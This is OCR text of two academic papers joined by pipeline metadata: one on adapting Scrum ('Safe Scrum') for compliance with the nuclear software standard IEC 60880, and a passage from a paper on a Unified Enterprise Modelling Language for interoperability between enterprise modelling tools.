"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 22686, 0.02778]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
50bd8ab290737b1cd43a53ec6c47fec0ad3e83c7
Scrum and IEC 60880 Tor Stålhane Norwegian University of Science and Technology +47 73594484, stalhane@idi.ntnu.no Vikash Katta Norwegian University of Science and Technology and OECD Halden Reactor Project, +47 45464323, vikash.katta@hrp.no Thor Myklebust SINTEF ICT +47 95779869, thor.myklebust@sintef.no Abstract Agile development has already proven to be a big success in several areas of application. It started in areas like web development but has now even moved into safety critical domains – e.g. air traffic management, automotive. Companies working with industrial automation – e.g. ABB – are considering using an agile development process. The main reason for this is that requirements changes are more frequent than before plus acceptance of the fact that requirements seldom are finished when the application development starts. To quote Daniel M. Barry “…it might be that the only solution is to identify requirements, to carry out a design sufficient to get a black-box description of the system, to identify and analyse hazards, and then to begin the lifecycle again with changed requirements”. NTNU – IDI has, together with SINTEF ICT, defined a process called Safe Scrum plus a process to handle the challenges posed by relevant standards. This process has already been applied to agile development using ISO 9001 and IEC 61508. For the proposed paper we will apply the same process to the standard IEC 60880 which is used in the nuclear power plant domain. Important issues discussed in the proposed paper will be documentation, planning and proof of conformance. These three areas are important in the development of all software that shall be certified. In addition, they are the three areas where agile and plan-driven development is most different. 1. Introduction Agile development is an idea, not a method. It is summed up in the agile manifesto as follows: - Individuals and interactions over processes and tools - Working software over comprehensive documentation - Customer collaboration over contract negotiation - Responding to change over following a plan That is, while there is value in the items on the right, we value the items on the left more. The agile movement can be seen as a reaction to the strong focus on documents and plans that was, and in many cases, still is prevailing in software development organizations. Many developers saw this as a straight-jacket and that it focused on fulfilling the plans at the expense of satisfying the customers. 2. What is Agile development and what is Scrum There is no such thing as “The agile development process”. People who implement the agile manifesto have met this challenge in different ways. Examples of processes are XP, Lean Software development and Scrum. Based on what we have seen in industry we will focus on Scrum since this method already has been implemented or is about to be implemented in several large companies – also in the safety critical area. The standard Scrum process is shown in figure 1. Avinor and Autronica already use Scrum in safety-critical application development while ABB is starting to consider it. In addition, several companies are evaluating Scrum for possible, later implementation. There are two main views on agile development - the believers’ view and the sceptics’ view. The following list is taken from a presentation by Geir K. Hanssen [1] and the items are summarized below. - The believers: - Agile development is cheaper because: - Only what is needed will be developed - Misunderstandings and errors are discovered early - Communication is more efficient - Better conditions for creativity - Changes cannot be controlled. Thus, it is better to emphasize change responses and change control - Self-organizing groups perform better - The sceptics - Customer attention is luxury - Customer will not accept "no plan – no estimates" - Small releases will only fit small problems and small projects - Agile development does not fit in traditional project management framework - Compliance with important standards such as IEC 61508 The Scrum process is one way to realize an agile process. The process is described by a Scrum process, a set of artefacts and three roles - see [1]. - The Scrum process - The Sprint planning meeting – select requirements for the next sprint - Sprints – also called iterations, where the implementation and testing is done. A sprint most often takes one week to one month. The work in each sprint can be viewed as a mini-waterfall development project. - The daily Scrum meetings – what did we do yesterday, which problems did we encounter and what will we do today? - Sprint review meetings. What did we achieve in this sprint, showing real, working code? - Sprint retrospectives – what went well in the previous sprint and what should be improved? How shall we change the process to realize the improvements? - Artefacts - The product backlog – the requirements that have been identified but not yet implemented - Sprint backlog – the requirements to be implemented in the coming sprint - The wall – a set of charts (e.g. the burn-down chart) showing the current project status. - Roles Product owner – customer representative Scrum team – those who do detailed design and coding. The team typically consists of five to ten persons who work full time on the project Scrum master – “project manager”. His main jobs are to facilitate development and to remove impediments 3. Why should the Safety-Critical Industry consider Scrum The part of the industry that develops safety-critical software has for a long time been plan-driven and methodically conservative. Several changes in the environment have, however, affected this: - The tempo with which new technology is introduced in the marketplace. This holds both for new products (what we develop) and for new components (what we uses) – e.g. sensors. - Increased focus on flexibility. This is partly a consequence of the first bullet point. - There is a growing realization that the plan-driven development paradigm is too much focussed on writing and rewriting plans that are not used and on producing documents that are not read. - The industry’s general focus on lean development and production. Whatever that does not contribute to the product’s final value should be removed. There is no reason to believe that the tempo of inventions and innovations will slow down and those who do not follow will quickly get into trouble. In addition, more and more developers are using agile development. It remains to be seen if these programmers will be interested in working in a development environment based on plan- and document-driven development methods. To quote from our IEC 61508 paper [2], the key benefits that comes from this combination of a safety-oriented approach and a process model for agile software development are that the process enables - Continuous feedback both to the customer, the development team and the independent test team. - Re-planning, based on the most recent understanding of the requirements and the system under development. - Mapping of functional and safety requirements. - Code-requirements traceability. - Coordination of work and responsibilities between the three key roles; the development team, the customer and the assessor. - Test-driven development of safety critical systems. All of these points will help us to get a more visible process and thus better control over the development process, which again will help us to deliver on time and within budget. 4. Challenges when using Scrum First and foremost – Scrum is a software development method. As a consequence of this, we need to single out software development in a separate activity. This does not mean that the software should be developed in isolation from the rest of the project but that it should be organized as a separate activity. The nuclear industry and any other industry that is dependent on safe operation of complex control systems will have one or more standards that shall help the industry in focussing on and achieving safe operation. These standards, however, mirror a traditional, plan- and document-driven view on software development. Changing these standards to also accommodate the agile development paradigm will take considerable time – e.g. five to ten years. There is also a real risk that the changes in software development paradigms will outrun the standards ability to change in order to incorporate such changes. Thus, in order to start using an agile development method – in this case Scrum – we need to explore two options: - Changes to Scrum – e.g. add-ons to cater to the traceability requirements - Alternative interpretations of requirements in the applicable standards – e.g. what should be accepted as proof of conformance for an activity? Both approaches are useful. The first and third author have used them both successfully in two cases – (1) Scrum and ISO 9001 [3] and (2) Scrum and IEC 61508 [2] – and we will use parts of both options later in this paper. 5. A Method for Scrum adoption We present a method for Scrum adopted to address the needs of development of safety system. This method was used in [2] and [3], it is simple and our experience so far is that it is highly efficient. 1. Collect a team containing a software expert, a domain expert and an assessor for the standard(s) under consideration 2. Identify all requirements in the standard related to software development 3. Go through all the requirements, asking the question “Will this requirement be fulfilled if we use Scrum?” This delegate each requirement to one of the following categories: a. Is fulfilled also if we use Scrum as is b. Is partly fulfilled if we use Scrum as is. Will need adding extra activities to the Scrum process c. Cannot be met if we use Scrum as is. 4. Use the two strategies identified in section 4 to sort out the problems – con-compliances This approach leaves us with two challenges – (1) have we identified all relevant requirements and (2) different assessors have different opinions of what should count as proof of conformance. Especially challenge (2) is problematic since it has no final solution. One possible way out of this is to involve the assessor from day one and ask questions such as “If we use approach X here, will this be accepted?” This approach must, however, be used with care so that we do not hold the assessor hostage to out choice of development process. If we need to ensure assessor independency, we can use one assessor as a “sparring partner” during the project and another one – preferably from the same organization – for certification. 6. IEC 60880 and Scrum 6.1 Relevant standard requirements We have taken sections 5 to 10 of IEC 60880 [4] as our main starting point. In addition, we have consulted IEC 62138 [5] and tables 2 and 3, section 1.11 in the document “Licensing of safety critical software for nuclear reactors” for guidance. From the diagram below, taken from IEC 60880, we see that the software implementation only concern a small part of the total process. It is only this part that is touched by Safe Scrum, the rest is Scrum independent. ![Figure 2: Activities in the system safety life cycle](image) We studied sections 5 to 10 of IEC 60880 in details. Based on the requirements stated in these sections, we selected the following areas for a closer scrutiny: - **5.3 – Software development approach.** This section has no references to processes or procedures and is thus by default, also applicable to Scrum - **5.4 – Software project management.** In this section, the standard states that the development process may be iterative, provided that certain requirements in clause 6 in IEC 61513 [8] are fulfilled. This part of IEC 61513 makes requirements to the system safety lifecycle, which have to be fulfilled outside Scrum. In addition, this section in sub-section 5.4.9 states that each phase should generate a set of documents according to annex F in this standard. - **5.5 – Software quality assurance plan,** which also include security assurance and safety assurance. This section says that there should exist a quality assurance plan. This plan may, however, be "adapted for individual product phases or particular software components…provided the principles defined in this standard are addressed " , and that “Any deviation from the requirements of this standard and its normative annexes shall be identified and justified”. Thus, it is up to the assessor what he is willing to accept. It is practical to have a company QA plan which can be reused, in whole or in parts, from one project to the next. In addition, other company specific standards will influence our solution. - 7 – Design and implementation. The most important provisions in this section are that there should be (1) a program structure based on decompositions, that this structure should be simple to understand, (3) that a top down approach should be preferred to a bottom-up solution and that (4) a conceptual model of the software architecture should be adopted at the beginning of each software project. In addition, the two clauses 7.1.2 and 7.1.3 are discussed in some more details below – see sections 6.2 and 7.2. Since Scrum and all other agile methods are specifically made to handle problems related to the specification and changing of requirements section 6 is an important part of the standard when we want to adapt to agile development. We have thus selected 6.1 – Specification of software requirements – for a closer look. As a consequence of the reference to annex F in IEC 60880, we also include sections 8.2.2 and 8.2.3 for a closer look. 6.2 A closer look We have singled out the following sections of the standard for a closer look: - 5.4 – Software project management - 9 requirements are OK - 2 requirements need a closer look – 5.4.9, which invokes annex F and 5.4.10. - 6.1 – Specification of software requirements. - 13 requirements are OK - 2 requirements need a closer look – 6.1.4 and 6.1.5, which invokes annex A - 7.1.2 – Implementation of new software in general-purpose languages - 4 requirements are OK - 1 requirement needs a closer look – 7.1.2.5, which invokes annex B - 7.1.3 – Implementation of new software in application-oriented languages - 4 requirements are OK - 0 needs a closer look - 8.2.2 – Design verification - 7 requirements are OK - 0 needs a closer look - 8.2.3 – Implementation verification - 11 requirements are OK - 1 requirement needs a closer look – the intro, which invokes table E.4.2 This gives us a To-Do list of six requirements. The rest – 48 requirements – do not need any special treatment or consideration when we use Scrum – 11%. To put these numbers into perspective, we had to have a closer look on 15 of 183 requirements when assessing Scrum for IEC 61508 – 8%. We found no requirements in the standard that could definitively not be fit into the Scrum process. 7. A workable solution 7.1 Safe Scrum We have observed that the safety requirements are quite stable, while the functional requirements can change considerably over time. The most important sources of changes for safety requirements are changes in relevant standards, which happen only seldom, and the discovery of new hazards during RAMS (Reliability, Availability, Maintenance and Safety) validation. This is taken care of in Safe Scrum with the possibility for revising the backlog after RAMS validation – see figure 3 below. Development with a high probability of changes to requirements will favour an agile approach. Usually, each backlog item also indicates the estimated amount of resources needed to complete the item – for instance the number of developer work hours. These estimates can be developed using simple group-based techniques like ‘planning poker’, which is a popularized version of wideband-Delphi [6]. All the risk and safety analyses on the system level are done outside the Safe Scrum process, including the analysis needed to decide the safety level. Software is considered during the initial risk analysis and all the later analysis – on per iteration. Just as for testing, safety analysis also improves when it is done iteratively and for small increments – see [7]. Due to the focus on safety requirements, we propose to use two product backlogs, one functional product backlog, which is typical for Scrum projects, and one safety product backlog, which is used to handle safety requirements. Adding a second backlog is an extension of the original Scrum process and is needed to separate the frequently changed functional requirements from the more stable safety requirements. With two backlogs we can keep track of how each item in the functional product backlog relates to the items in the safety product backlog, i.e. which safety requirements that are affected by which functional requirements. This can be done by using simple cross-references in the two backlogs and can also be supported with an explanation of how the requirements are related if this is needed to fully understand a requirement. Figure 3: Safe Scrum process 7.2 **Scrum adaptations** - **5.4.9** – Annex F in IEC 60880, lists a recommended set of documents to be generated at the end of each phase. Since each sprint is a miniature V-model, each sprint will contain activities from several phases. The relevant points in the annex F table are 8.2.2 and 8.2.3 – both related to verification. Each phase will need a set of documents generated at the end of a phase to prove that the activities are done according to the standard. It is up to the assessor what he will accept as proof of conformance. This thus needs to be discussed and agreed upon at the start of the project. Note that these documents will have to be (partly) rewritten when one or more requirements changes. The three documents needed at the end of each sprint are - Software test specification document. Given the dynamic nature of requirements handling in Scrum, this report has to be written when handling each requirement, based on the tests designed for this requirement. - Software code verification report – written at the end of each sprint - Software test report – written at the end of each sprint. - **5.4.10** – “Each phase shall be systematically terminated by a review...” Based on the way a project phase is described in section 5.4, we will consider the end of a sprint as the end of a set of phases. Scrum already has a review at the end of each sprint but this may need to be extended in order to meet the assessor’s requirements. - **6.1.4** – “…the process of laying down software requirements shall be rigorous”. It is up to the assessor to decide what he will accept as rigorous. As a minimum the organization needs to propose a definition which should be company-wide, not project specific. It is common in Scrum to elaborate the requirements when they are taken out of the sprint backlog. This will, however, not be sufficient in our case and we must adapt Scrum as follows: all requirements must be rigorously defined when they are - Inserted into the backlog - Taken out of the sprint backlog - Revised and reinserted into the backlog - **6.1.5** – Annex A is related to the software safety life cycle. This annex describes how to handle requirements. Part of this – e.g. A.2.1: Description of constraints between hardware and software – is handled outside Safe Scrum, while other parts – e.g. A.2.2: Self-supervision – is taken care of by requirements in the safety product backlog. - **7.1.2.5** – Annex B is related to requirements handling. The first part handles the design process, which is outside Scrum – often called Scrum iteration 0. Part 2 handles the software structure, which should be part of the coding standard and will not affect the choice of development process. The same holds for part 3 – Self-supervision and part 5 – Language dependent recommendations. Part 4 is about subroutines and goes a long way towards recommending test-driven development, albeit without actually using this term. The important challenge is found in B4gc which requires that “A formal description of the test inputs and results (test protocol) should be produced.” This is an extension of the common way of doing testing in Scrum and we thus need to insert this into the develop-and-test part of the development process. - **8.2.3** – Table E.4.2: Testing methods. This table describes types of tests that should be performed – e.g. path testing, data movement testing and timing testing – and should thus be included into a test procedure description. 8. Threats to validity When discussing the relevance of our conclusions, four things are important – have we understood certification, the standard, have we touched all relevant parts and have we understood agile development in general and especially Scrum? We will briefly discuss each of these requirements below. - Have we understood the right way to do certification? One of the authors has been working with safety certification of safety-critical systems for a long time. His experience and insight give confidence that our discussions and conclusions are sound. - Have we understood IEC 60880? One of the authors has been working in the nuclear industry for a long time and knows the relevant standards and how they are used in nuclear-related software development. Thus, this part is OK. - Have we touched all relevant items? We have scrutinized the standard and identified all parts where the term “software” has been used. The requirements handled in sections 6.3 and 7.3 thus cover all relevant items. - Have we understood agile development – especially Scrum? We have already done extensive research on the application of Scrum in two other standards – ISO 9001 and IEC 61508. IEC 60880 contains no problems that have not already been discussed in relation to the two previous standards. - Our claim to validity is based on the three preceding bullet points. Based on the discussion above, we are confident that the adaptation described in section 7 will make it possible to use Scrum as a development process and still be IEC 60880 compliant. 9. Conclusions and Further work First and foremost; while there are problems with the application of Scrum-as-is together with IEC and IEC 60880 – e.g. traceability – these and all other problems identified in section 6 above are taken care of when using our Safe Scrum. In addition – the assessor need to be involved from day one of the development. We have already identified several sections in relevant parts of the standard where the standard itself leaves the requirements open to interpretation. It is the development organization’s duty to make a relevant interpretation of each requirement in the standard but it will ease the final certification process tremendously if these interpretations are accepted by the assessor before development starts. As should be expected, the majority of Scrum problems handled by Safe Scrum are related to the handling of software requirements and to testing – test specifications, the test methods used and the final test report for each requirement. The next step in this work is to try and identify a small but real project in the nuclear industry where we can try Safe Scrum in a real environment. As always, the proof of the pudding is in the eating. 10. References
{"Source-Url": "https://www.sintef.no/globalassets/scrum-and-iec-60880_march-2013.pdf", "len_cl100k_base": 5033, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 20243, "total-output-tokens": 5932, "length": "2e12", "weborganizer": {"__label__adult": 0.0003235340118408203, "__label__art_design": 0.00025653839111328125, "__label__crime_law": 0.0004119873046875, "__label__education_jobs": 0.0015745162963867188, "__label__entertainment": 3.826618194580078e-05, "__label__fashion_beauty": 0.00015079975128173828, "__label__finance_business": 0.0005965232849121094, "__label__food_dining": 0.0003223419189453125, "__label__games": 0.0004732608795166016, "__label__hardware": 0.0010128021240234375, "__label__health": 0.0005173683166503906, "__label__history": 0.0001838207244873047, "__label__home_hobbies": 9.953975677490234e-05, "__label__industrial": 0.0012979507446289062, "__label__literature": 0.00016021728515625, "__label__politics": 0.00020742416381835935, "__label__religion": 0.00038051605224609375, "__label__science_tech": 0.01381683349609375, "__label__social_life": 6.198883056640625e-05, "__label__software": 0.00469207763671875, "__label__software_dev": 0.97216796875, "__label__sports_fitness": 0.0003998279571533203, "__label__transportation": 0.0006504058837890625, "__label__travel": 0.00019073486328125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24728, 0.02897]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24728, 0.29942]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24728, 0.93753]], "google_gemma-3-12b-it_contains_pii": [[0, 2504, false], [2504, 5221, null], [5221, 7409, null], [7409, 10481, null], [10481, 12441, null], [12441, 15060, null], [15060, 17229, null], [17229, 20734, null], [20734, 23791, null], [23791, 24728, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2504, true], [2504, 5221, null], [5221, 7409, null], [7409, 10481, null], [10481, 12441, null], [12441, 15060, null], [15060, 17229, null], [17229, 20734, null], [20734, 23791, null], [23791, 24728, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24728, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24728, null]], "pdf_page_numbers": [[0, 2504, 1], [2504, 5221, 2], [5221, 7409, 3], [7409, 10481, 4], [10481, 12441, 5], [12441, 15060, 6], [15060, 17229, 7], [17229, 20734, 8], [20734, 23791, 9], [23791, 24728, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24728, 0.0]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
6be32ce64ca061d6adb8cf2b6f08b5acfd777a17
A Unified Enterprise Modelling Language for enhanced interoperability of Enterprise Models Hervé Panetto, Giuseppe Berio, Khalid Benali, Nacer Boudjlida, Michaël Petit To cite this version: Hervé Panetto, Giuseppe Berio, Khalid Benali, Nacer Boudjlida, Michaël Petit. A Unified Enterprise Modelling Language for enhanced interoperability of Enterprise Models. 11th IFAC INCOM2004 Symposium, Apr 2004, Bahia, Brazil. pp.1-12. hal-00120943 HAL Id: hal-00120943 https://hal.science/hal-00120943 Submitted on 19 Dec 2006 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. A UNIFIED ENTERPRISE MODELLING LANGUAGE FOR ENHANCED INTEROPERABILITY OF ENTERPRISE MODELS Hervé Panetto¹, Giuseppe Berio², Khalid Benali³, Nacer Boudjlida³, Michaël Petit⁴ ¹CRAN UMR 7039, University Henri Poincaré Nancy I, F-54506 Vandoeuvre-les-Nancy Cedex Herve.Panetto@cran.uhp-nancy.fr ²Dipartimento di Informatica, Università di Torino, Torino, Italy berio@di.unito.it ³LORIA UMR 7503, F-54506 Vandoeuvre-les-Nancy Cedex ⁴Institut d’Informatique, Facultés Universitaires Notre-Dame de la Paix, Namur, Belgium mpe@info.fundp.ac.be Abstract: There is a serious backwardness in awareness, acceptance and wide use of the Enterprise Modelling (EM) technology in industry because enterprises cannot capitalise from previous modelling efforts. This situation hinders true enterprise integration, interoperability, and enterprise knowledge sharing. A Unified Enterprise Modelling Language, based on meta-modelling of existing EM Languages, would serve as an Interlingua between EM tools providing the business community with a common visual, template based language to be used on top of most commercial enterprise modelling and workflow software tools. Keywords: enterprise modelling, meta-modelling, interoperability, enterprise system 1. INTRODUCTION Today's "business trends are clearly towards the need for managing organizational and operational changes within companies in order to face global competition and fluctuating market conditions" (Vernadat, 1996). This situation poses a number of integration (and interoperability) problems that enterprises have to tackle: integration of markets, integration between several development and manufacturing sites, integration between suppliers and manufacturers, integration of design and manufacturing, integration of multi-vendor hardware and software components. Enterprise Integration is therefore, not anymore only a problem of interconnecting physical and software applications but it also requires global business integration, aiming at the use of the existing or new enterprise resources in order to better achieve the overall business objectives. "Things to be integrated and coordinated need to be modelled. Thus, Enterprise Modelling (EM) is clearly a prerequisite for enterprise integration". According to Vernadat (1996), enterprise modelling is the set of activities or processes used to develop the various parts of an enterprise model to address some desired modelling finality. It can also be defined as the art of “externalising” enterprise knowledge, i.e. representing the enterprise in terms of its organisation and operations (e.g. processes, behaviour, activities, information, object and material flows, resources and organisation units, and system infrastructure and architectures). The finality is to make explicit facts and knowledge that add value to the enterprises or can be shared by business applications and users. The prime goal of enterprise modelling is not only to be applied for better enterprise(s) integration but also to support analysis of an enterprise, and more specifically, to represent and understand how the enterprise works, to capitalize acquired knowledge and know-how for later reuse, to design (or redesign) a part of the enterprise, to analyse some aspects of the enterprise (by e.g. economic analysis, organization analysis, qualitative or quantitative analysis,...), to simulate the behaviour of (some part of) the enterprise, to make better decisions about enterprise operations and organization, or to control, coordinate and monitor some parts of the enterprise. Within the initiative on Computer Integrated Manufacturing (CIM), Enterprise Modelling was born in the United States at the beginning of the 80's and emerged through large CIM projects (e.g. ICAM or CAM-I). In the mid-80's, Europe launched several projects on Enterprise Modelling giving birth to several enterprise modelling languages (including notably GRAI (Doumeingts, et al., 1998) and CIMOSA (AMICE, 1997; Kosanke, et al., 1999)). As a result, in the 90's many commercial tools dealing with EM or business process modelling appeared on the marketplace, e.g. ARIS ToolSet, FirstSTEP, METIS, Enterprise Modeller, KBSI, CimTool, MO²GO, e-MAGIM and many others. Because most resources in modern enterprise were computerised systems, the problem of enterprise integration was also been approached with workflow systems, each one with its own modelling environment (Action Workflow, COSA, FlowMark, Lotus Notes, Teamware Flow, Ensemble, WorkParty, ...) and, in the late 90’s, with EAI (Enterprise Applications Integration) tools. In computerised systems, the situation is currently worse than before. This is mainly due to the “Internet based systems” which, while offering very powerful, low cost and open infrastructures, fall short of integration. In fact, the many related standards (e.g., XML and its customisations) do not directly address the “problem of meaning”. This intensive production of tools has led to a Tower of Babel situation in which the many tools, while offering powerful and distinct functionalities, are unable to interoperate and can hardly or not at all communicate and exchange models. This is a serious drawback for awareness, acceptance and wide use of the EM technology since enterprises cannot capitalise from previous modelling efforts. This situation hinders true enterprise integration, interoperability, and sharing enterprise knowledge. 2. ENTERPRISE INTEGRATION AND ENTERPRISE MODELLING Enterprise Modelling is an engineering discipline closely related to computerised systems. As such, it requires the combined use of Enterprise Modelling Software Environments (EMSE), Enterprise Modelling Languages (EML), and Enterprise Engineering Methodologies (EEM). According to this point of view, there exists a lot of fragmented approaches to enterprise modelling (including Methodologies, Languages and Tools). They cover different subsets of the different components of the enterprise engineering world. For instance, the ENV12204 (CEN, 1995) standard of CEN provides an Enterprise Modelling Language, but does not address any of the other components (no tool, methodology or meta-modelling capacity)); GERAM (GERAM, 1997) and ISO/IEC 15288 define methodological guidelines for Enterprise Engineering but without any modelling language; the Workflow Management Coalition (WfMC) provides a modelling language (WPDL) but without methodological support for using this language for modelling processes; the same happens with other EAI tools (such as the so called Integration Brokers). They also cover different parts of the enterprise life-cycle. For instance, ebXML and WfMC focus on software design while approaches like CIMOSA mainly concentrate on enterprise requirements and design. Additionally, some approaches link enterprise models to Enterprise Operation Tools (EOT). These links allow the produced models to be used, for instance, for process enactment and control (e.g. in the WfMC approach, WPDL models are used by a workflow engine to control the execution of ongoing work). Models may be also linked to enterprise software applications like ERP (Enterprise Resource Planning) systems (e.g. ARIS and mySAP.com). Some other approaches only aim at modelling for understanding and analysing and they do not provide explicit links to operational systems or to other models in the life-cycle (e.g. ENV12204). Enterprise modelling approaches may also have very different objectives and needs. As a meaningful example, we may compare the aims of IEM and GRAI. IEM allows representing business processes and it provides specific concepts adapted for assessing quality management procedures, but it cannot directly be employed for an operational implementation of the business processes. In fact, for quality management, it is not necessary to fully define an implemented process. The description has only to be sufficient to enable determining whether the process steps conform to defined quality procedures. This later objective requires, for example, representing outcomes of each process step and their usage as inputs for other process steps. On the other hand, the main objective of GRAI modelling is to define the control system of an enterprise. This requires a very good understanding of the relationships between the business processes at the various control levels (operational, tactical, and strategic). Quality procedures do not guarantee that an enterprise has good performance but only that its products conform to some quality criteria, whereas enterprise control tries guarantee that an enterprise... In enterprise modelling, there seems to be a tendency for approaches combining, in a more or less integrated way, several sub-languages or views (see e.g. CIMOSA, GRAI, and ARIS). A combining approach allows taking advantage of the strengths of each of the sub-languages and offers the advantage that the resulting combined method or methodology offers the modeller the capacity to meet more modelling objectives. Models built with the distinct languages have to be related in some way and the languages have to be integrated. This need for integrating distinct modelling languages and relating models has also been recognised in domains like software formal methods for achieving effective and “practical” solutions to complex problems. However, the integration of several sub-languages (often called views) is currently always performed within a single tool (i.e. in a single approach which creates many overlapping with other existing approaches). No tool (at least in the enterprise modelling domain) currently supports the combination of its own models with models created with a language supported by another tool. A completely integrated language allowing the creation of models combining all needed aspects of the reality is probably unachievable and the supporting tools for that language would be too complex to build. Therefore, the only reasonable approach seems to be to create a modelling environment from “legacy” enterprise modelling tools (and languages) allowing to reuse existing models and to leverage these existing models and tools into an integrated environment. This integrated environment should also be complemented with a process for extending, in a controlled way, a set of limited constructs belonging to a core language. As we will see in the remainder (section 3.3), a sample of this process has been defined during the UEML project. 3. THE UEML The UEML project was set up in an attempt to contribute to the solving of the problems of multiple EMLs. The long term objective of UEML is the definition of a core language called Unified Enterprise Modelling Language, which would serve as an Interlingua between EM tools. This language will: - Provide the business community with a common visual, template based language to be used on top of most commercial enterprise modelling and workflow software tools; - Provide standardised mechanisms for sharing and exchanging enterprise models among projects, overcoming tool dependencies; - Support the implementation of open and evolutionary enterprise model repositories to leverage enterprise knowledge engineering services and capabilities. In order to prepare this long term objective, the UEML project was initiated with the objective to create and manage a working group aiming to: - Create a European Consensus on a core set of modelling constructs and facilitating interoperability in the frame of on-going standardisation efforts in this domain. - Build a demonstrator portal with services and contents to support and promote, testing, industrial validation, and to collect comments. The first objective of the project was to analyse the market potential of a UEML, to accurately define the specifications of an embryo of such a language and to demonstrate and disseminate the concepts. 3.1 The need for UEML Two main efforts related to the definition of a common core language for enterprise modelling are PSL (PSL, 2002) and ENV12204 that however do not currently provide a satisfactory answer to critical and also practical problems. PSL is a logic-based approach that does not clearly address the problem of the basic mapping between a generic EML and PSL itself. This mapping should e.g. state, for instance, that the concept of Activity belonging to an EML corresponds to the concept of Activity in PSL. Being a declarative language, PSL allows discovering inconsistencies between distinct models provided in distinct EMLs. However, it neither prevents nor solves these inconsistencies. ENV12204 is merely a set of useful concepts for understanding the domain of enterprise modelling (or even the set of things that need to be represented by any enterprise modelling language). However, its syntax is not well defined and therefore it cannot be used as an exchange format between distinct tools. It also does not define mappings between existing EMLs and itself. The usefulness of a UEML would therefore reside in the availability of a well-defined syntax and well-defined mappings (possibly standardised) between various EMLs and UEML. We believe that the definition of mappings between languages and UEML is important but quite independent from the UEML definition itself. Thought, they should be precisely defined and shared (through, for instance, standardisation), they should base on reasonable hypotheses and will never be fully (and formally) provable. --- 2 A new version of ENV 12204, EN ISO 19440 is expected in early 2004. Other approaches which attempt to solve the problems of exchange and interoperability between computerised systems do not deal clearly with the enterprise modelling area. They can be classified as ways for enabling business level communication between distinct computer-based systems and therefore as bottom-up approaches. For instance, ebXML, WPDL, EAI techniques are useful for defining communication at business level among enterprise software. These approaches are really useful for programming software layers such as middleware (e.g. CORBA) and customising software architectures. This description of purely software aspects can be considered as a kind of high level programming that anyway requires enterprise modelling as a prerequisite. However, another prerequisite for the exchange of models (or to make models interoperable) through a common language to be meaningful is to clearly understand the semantic links existing between the models themselves. This understanding is fundamental because without it, an exchanged model could be understood in a totally different way by the receiving tool, and thus misinterpreted. 3.2 The need for meta-modelling In order to understand the links between distinct languages, meta-modelling is an important issue. Meta-modelling allows defining the syntax of a language\(^3\). The product of meta-modelling is usually called a meta-model. Meta-models need to be described by using meta-modelling techniques (i.e. languages for making meta-models). Approaches like XML (DTDs and Schemas), MOF, Telos, can be used. These techniques are content-independent (applicable for the definition of any language). Other meta-modelling techniques are content-dependent (and sometimes domain-specific): for instance, XMI is an exchange format based on the meta-model of UML (UML, 2003) in XML designed for enabling exchange of UML models. Accordingly, a UEML could be defined as a content-dependent domain-specific meta-model through a content-independent meta-model. The UEML might just use content-independent meta-modelling techniques\(^4\) as a way for its definition. Currently, several Meta-Modelling Languages (and also tools) exist but none of them are specifically targeted for the definition of EMLs. The reason is that these Meta-Modelling Languages were often developed to design and implement Information Systems, Knowledge Base Systems and computer-based infrastructures (environments) allowing to program meta-models. 3.3 The UEML approach In the UEML project, a UEML meta-model was built on the basis of three existing languages (namely IEM, EEML and GRAI). An illustrative scenario was defined in which models of a common situation are stored in distinct software tools and exchanged. First, models of this scenario where elaborated in the three distinct languages and the exchange was performed manually by specialists of these languages. More precisely, given a first model in IEM, specialists of GRAI and EEML provided the “semantically equivalent” model in their own languages. Afterward, IEM, EEML and GRAI constructs have been meta-modelled using UML class diagram. This resulted in three so-called “original meta-models”. At the same time, the links between the concepts of every original meta-model and their use in the models of the Scenario were defined to illustrate how a unique real-world phenomenon is modelled with the three original meta-models. With the aim to define a common meta-model for core constructs, we compared and “unified” the three meta-models through an incremental approach. We compared the three meta-models peer-to-peer to find any correspondence between a concept in one meta-model and a concept in another one. Once the peer-to-peer correspondences (and absence of correspondences) had been defined, a set of common concepts were identified (Table 1) and further elaborated into the first version of the UEML meta-model 1.0 (Fig. 1). This meta-model represents the common concepts underlying the three original EMLs. This meta-model being remarkably different from the three meta-models by the use of an appropriate higher level of abstraction and considering some discrepancies among the three original meta-models, we informally re-defined new correspondences between the UEML meta-model and each original meta-model. Finally, the UEML meta-model and the new correspondences were validated against a subset of the Scenario. 3.4 Defining mappings among EMLs The clear definition of the meta-models of existing EMLs and of UEML with meta-modelling techniques is necessary but not sufficient to achieve a meaningful exchange of models. The \(^{3}\) A meta-model may also be used to define part or all of the semantics of the language. But this is often not recommended. \(^{4}\) It should be noted that the notion of meta-modelling technique is relative. 